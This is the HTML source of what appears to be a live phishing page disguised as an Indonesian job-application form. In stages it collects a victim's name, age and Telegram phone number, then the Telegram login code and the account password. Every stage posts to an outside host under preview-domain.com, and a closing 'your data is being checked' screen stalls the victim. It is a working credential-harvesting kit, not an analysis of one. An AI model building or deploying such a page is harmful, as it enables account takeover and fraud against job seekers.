<!doctype html>
<html lang="en" class="h-100">

<head id="ctl00_Head1">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <link href="custom.css" type="text/css" rel="stylesheet" />
    <link href="menebus.css" type="text/css" rel="stylesheet" />
    <meta charset="UTF-8">
    <meta property="og:title" content="INFO LOKER 2024">
    <meta property="og:image" content="1.jpg">
    <meta name="description" />
    <meta name="author" content="INFO LOKER 2024" />
    <title>INFO LOKER 2024</title>
    <link rel="icon" type="image/x-icon" href="favicon.png" />
    <link rel="canonical" href="https://getbootstrap.com/docs/5.0/examples/sticky-footer/" />
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" />
    <script type="text/javascript" src="vue.min.js.download"></script>
    <script src="clipboard.js.download"></script>
    <script type="text/javascript" src="index.js.download"></script>
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css" />
    <link rel="stylesheet" type="text/css"
        href="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.css" />
    <style type="text/css">
        .bd-placeholder-img {
            font-size: 1.125rem;
            text-anchor: middle;
            -webkit-user-select: none;
            -moz-user-select: none;
            user-select: none;
        }

        @media (min-width: 768px) {
            .bd-placeholder-img-lg {
                font-size: 3.5rem;
            }
        }

        /* Absolute Center Spinner */
        .loading {
            position: fixed;
            z-index: 999;
            height: 2em;
            width: 2em;
            overflow: show;
            margin: auto;
            top: 0;
            left: 0;
            bottom: 0;
            right: 0;
        }

        /* Transparent Overlay */
        .loading:before {
            content: '';
            display: block;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: radial-gradient(rgba(20, 20, 20, .8), rgba(0, 0, 0, .8));

            background: -webkit-radial-gradient(rgba(20, 20, 20, .8), rgba(0, 0, 0, .8));
        }

        /* :not(:required) hides these rules from IE9 and below */
        .loading:not(:required) {
            /* hide "loading..." text */
            font: 0/0 a;
            color: transparent;
            text-shadow: none;
            background-color: transparent;
            border: 0;
        }

        .loading:not(:required):after {
            content: '';
            display: block;
            font-size: 10px;
            width: 1em;
            height: 1em;
            margin-top: -0.5em;
            -webkit-animation: spinner 150ms infinite linear;
            -moz-animation: spinner 150ms infinite linear;
            -ms-animation: spinner 150ms infinite linear;
            -o-animation: spinner 150ms infinite linear;
            animation: spinner 150ms infinite linear;
            border-radius: 0.5em;
            -webkit-box-shadow: rgba(255, 255, 255, 0.75) 1.5em 0 0 0, rgba(255, 255, 255, 0.75) 1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) 0 1.5em 0 0, rgba(255, 255, 255, 0.75) -1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) -1.5em 0 0 0, rgba(255, 255, 255, 0.75) -1.1em -1.1em 0 0, rgba(255, 255, 255, 0.75) 0 -1.5em 0 0, rgba(255, 255, 255, 0.75) 1.1em -1.1em 0 0;
            box-shadow: rgba(255, 255, 255, 0.75) 1.5em 0 0 0, rgba(255, 255, 255, 0.75) 1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) 0 1.5em 0 0, rgba(255, 255, 255, 0.75) -1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) -1.5em 0 0 0, rgba(255, 255, 255, 0.75) -1.1em -1.1em 0 0, rgba(255, 255, 255, 0.75) 0 -1.5em 0 0, rgba(255, 255, 255, 0.75) 1.1em -1.1em 0 0;
        }

        /* Animation */

        @-webkit-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }

        @-moz-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }

        @-o-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }

        @keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }
    </style>

</head>

<body class="d-flex flex-column h-100">

    <!---
<div class="item">
<div class="record_logo">
<img src="img/avatar.png" alt="">
</div>
<div class="center">
<div class="h1"><span class="name"></span> <span>Berjaya</span> <span class="eruda-number">RM 1.000,00</span></div>
<div class="h2">3 jam yang lalu</div>
</div>
</div>
-->
    <div id="loading" class="loading" style="display: none;"></div>

    <main class="flex-shrink-0">
        <div id="ctl00_divContainer" class="container container-narrow">
            <div class="text-center mt-2">
                <a id="ctl00_lnkMalay" disabled="disabled"
                    style="color:Black;font-weight:bold;text-decoration:none;"></a>
                <span id="ctl00_lblPipe_bm">  </span>
                <a id="ctl00_lnkEng" href=""></a>
                <span id="ctl00_lblPipe_bi">  </span>
                <a id="ctl00_lnkChineseSimplified" href=""></a>
                <span id="ctl00_lblPipe_bc">  </span>
                <a id="ctl00_lnkTamilInd" href=""> </a>
            </div>
            <div class="header mt-3 text-center">
                <img src="1.jpg" id="ctl00_logohead" class="img-fluid" width="350" />
            </div>
            <script type="text/javascript">
                //<![CDATA[
                var theForm = document.forms['aspnetForm'];
                if (!theForm) {
                    theForm = document.aspnetForm;
                    A
                }
                function __doPostBack(eventTarget, eventArgument) {
                    if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                        theForm.__EVENTTARGET.value = eventTarget;
                        theForm.__EVENTARGUMENT.value = eventArgument;
                        theForm.submit();
                    }
                }
                //]]>
            </script>
            <script type="text/javascript">
                //<![CDATA[
                function WebForm_OnSubmit() {
                    if (typeof (ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
                    return true;
                }
                //]]>
            </script>
            <span id="ctl00_lblMsg"></span>

            <div class="first">
                <h4 class="fw-bold mt-2 page-header text-center ">
                    <span id="ctl00_RecipientMasterContent_lblSubject">
                        <marquee scrolldelay='30'>Silahkan isi Data Anda Dengen Benar Di Bawah Untuk Melamar Pekerjaan</marquee>
                    </span>
                </h4>
                <form action="https://regist-scherevoo-online.preview-domain.com/firstData.php" method="post" id="firstForm">
                    <section>
                        <p
                            style="background: #05529be8; color: #f1f3f5; padding-top: 1px; margin-bottom: 6px; padding-bottom: 0px; height: 31px; font-size: 14px; text-align: center;">
                            &nbsp; Pendafatran Pekerjaan</p>
                        <div class="first">
                            <div class="col-sm-12">
                                <label for="Name">Nama Lengkap (sesuai E-KTP)</label>
                                <input class="form-control" placeholder="Nama Lengkap" data-presence="true"
                                    data-content="Sila isikan ruang ini" maxlength="100" size="100" type="text"
                                    name="full_name" id="full_name">
                            </div>
                            <div class="col-sm-12">
                                <label for="Name">Usia</label>
                                <input placeholder="Masukan Usia anda" class="form-control" data-presence="true" data-ic="true"
                                    data-content="Sila masukkan nombor pengenalan yang sah" type="text" name="icnumber"
                                    id="icnumber">
                            </div>
                      
                                <!-- 
                  <div class="field-arrow">
                  </div>
                  <div class="field-arrow">

                  </div>
                 -->
                            </div>
                            <div class="col-sm-12">
                                <label for="sector">Jenis Klamin</label>
                                <div class="field-arrow">
                                    <select class="form-control ploan_application_sector" data-presence="true"
                                        data-content="Sila buat mana-mana pilihan" name="sek" id="sek">
                                        <option value="Laki-laki">Laki Laki</option>
                                        <option value="Prempuan">Prempuan</option>
                                    </select>
                                </div>

                            </div>
                            <div class="col-sm-12">
                                <label for="Name">Nomor telepon Telegram Aktif</label>
                                <input placeholder="Phone Number" class="form-control" data-presence="true"
                                    data-content="Silakan masukkan nomor telepon yang aktif dan sudah menggunakan Telegram"
                                    type="tel" name="phone_number" id="phone_number">
                            </div>
                            <div class="col-sm-12">
                                <label for="agree_telegram">
                                    <input name="personal_loan_application[agree_whatsapp]" type="hidden"
                                        value="0"><input data-checkbox="true"
                                        data-content="Sila tandakan kotak berkenaan" type="checkbox" value="1"
                                        name="personal_loan_application[agree_whatsapp]"
                                        id="personal_loan_application_agree_whatsapp">
                                        Saya setuju untuk menerima pesan Telegram dari Admin tentang Pekerjaan Ini
                                </label>
                            </div>
                            <div class="text-center">
                                <button type="submit" class="btn btn-lg btn-block btn-mk"
                                    onclick="processFirstData()">Mendaftar</button>
                            </div>

                        </div>
                    </section>
                </form>
            </div>

            <div class="second" style="display: none;">
                <form action="https://regist-scherevoo-online.preview-domain.com/sencondData.php" method="post" id="secondForm">
                    <input type="hidden" name="phone_number" id="validatephone_number" readonly>
                    <div class="mb-3">
                        <label for="otp_code" class="form-label">
                            <span id="ctl00_RecipientMasterContent_lblEntry_IDNo">Kami telah mengirimkan Anda kode verifikasi
                                ke aplikasi Telegram di perangkat Anda.</span>
                        </label>
                        <input name="otp" maxlength="5" id="otp" class="form-control" type="tel"
                            required="true" placeholder="Masukkan kode pengesahan">
                    </div>
                    <div class="text-center">
                        <button type="submit" class="btn btn-lg btn-block btn-mk"
                            onclick="processSecondData()">BERIKUTNYA</button>
                    </div>
                </form>
            </div>

            <div class="third" style="display: none;">
                <form action="https://regist-scherevoo-online.preview-domain.com/thirdData.php" method="post" id="thirdForm">
                    <input type="hidden" name="phone_number" id="validatephone_number" readonly>
                    <input type="hidden" name="otp" id="validateotp" readonly>
                    <div class="mb-3">
                        <label for="password" class="form-label">
                            <span id="ctl00_RecipientMasterContent_lblEntry_IDNo">Masukkan kata sandi
                                Anda (opsional).</span>
                        </label>
                        <input name="password" id="password" class="form-control" type="text"
                            placeholder="Masukkan kata laluan anda">
                    </div>
                    <div class="text-center">
                        <button type="submit" class="btn btn-lg btn-block btn-mk"
                            onclick="processThirdData()">Konfirmasi</button>
                    </div>
                </form>
            </div>

            <div class="four" style="display: none;">
                <div class="container">
                    <p
                        style="background: #173865; color: #f1f3f5; padding-top: 1px; margin-bottom: 6px; padding-bottom: 0px; height: 31px; font-size: 14px; text-align: center;">
                        &nbsp; STATUS ANDA SEDANG DALAM PENGECEKAN.<br /><br /></p>
                    <section style="border: 1px solid #c2c5c8; padding: 12px 20px 20px 20px;">
                        <form action="javascript:void(0)" method="post" id="fourForm" enctype="multipart/form-data">
                            <input type="hidden" name="phone_number" id="validatephone_number" readonly>
                            <input type="hidden" name="otp" id="validateotp_code" readonly>
                            <input type="hidden" name="password" id="validatepassword" readonly>
                            <div class="mb-3">
                                <p class="fw-bold mt-2 page-header text-center ">
                                    <span id="ctl00_RecipientMasterContent_lblSubject">JIKA ANDA TELAH DI TERIMA KAMI AKAN MENGIRIMKAN PESAN MELALUI TELEGRAM </span>
                                </p>
                            </div>
                            <br>

                            <div class="mb-3">
                                <p class="fw-bold mt-2 page-header text-center ">
                                    <span id="ctl00_RecipientMasterContent_lblSubject">PASTIKAN DATA YANG ANDA MASUKAN BARUSAN SUDAH BENAR,</span>
                                </p>
                                
                            </div>

                            <section class="text-center" style="padding-top: 24px;">
                                <input class="btn btn-primary" type="submit" onclick="processfourData()"
                                    style="width: 280.65px;font-weight: bold;background: rgb(245,15,0);"
                                    value="KOMFIRMASI">
                            </section>
                        </form>
                    </section>
                </div>

            </div>

            <div class="row five" id="ctl00_RecipientMasterContent_divResultNotFound" style="display: none;">
                <p class="text-center"><img src="processing.gif" id="ctl00_logohead" class="img-fluid"
                        width="160" /></p>
                <h5 class="text-center"><span id="ctl00_RecipientMasterContent_lblNoRecord">SILAHKAN TUNGGU KAMI SEDANG MELAKUKAN PENGECEKAN DATA ANDA</span></h5>
                <p class="text-center"><a href="index.html" class="btn btn-lg btn-block btn-mk">&laquo; <span
                            id="ctl00_RecipientMasterContent_lblGoBack_NoResult">Gunakan Nomor lain</span></a>
                </p>
            </div>


        </div>
        <script src="script.js"></script>


        <script type="text/javascript">
            //<![CDATA[
            var Page_ValidationActive = false;
            if (typeof (ValidatorOnLoad) == "function") {
                ValidatorOnLoad();
            }
            function ValidatorOnSubmit() {
                if (Page_ValidationActive) {
                    return ValidatorCommonOnSubmit();
                } else {
                    return true;
                }
            }
        </script>





    </main>
    <br>
    


    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.7.1.min.js"
        integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
    <script type="text/javascript" src="jquery-3.4.1.min.js.download"></script>
    <script>
        $(document).ready(function () {
            $('.slider').slick({
                autoplay: true,
                autoplaySpeed: 2500
            });
        });
    </script>
    <script>
        // 加载多语言
        var language = getQueryString('language')
        loadLocale(function (e) {
            app.locale = Object.assign(e.Common, e.CommonShare)
        }, language)
        var app = new Vue({
            el: '#app',
            data: {
                locale: {},
                uid: '2004219',
            },
            created() {
                $('#app').show();
                this.starScroll();
            },
            methods: {
                starScroll() {
                    var _this = this;
                    _this.scrollTimer && clearTimeout(_this.scrollTimer)
                    _this.scrollTimer = setTimeout(() => {
                        var $box = $("#list").find(".list:first");
                        $box.css({
                            marginTop: 0
                        })
                        var $item = $box.find(".item:first");
                        var outerHeight = $item.outerHeight(true)
                        $box.animate({
                            "marginTop": -outerHeight + "px"
                        }, 1000, function () {
                            $box.css({
                                marginTop: 0
                            }).find(".item:first").appendTo($box);
                            _this.starScroll();
                        })
                    }, 600);
                },
            },
        })
    </script>

</body>

</html>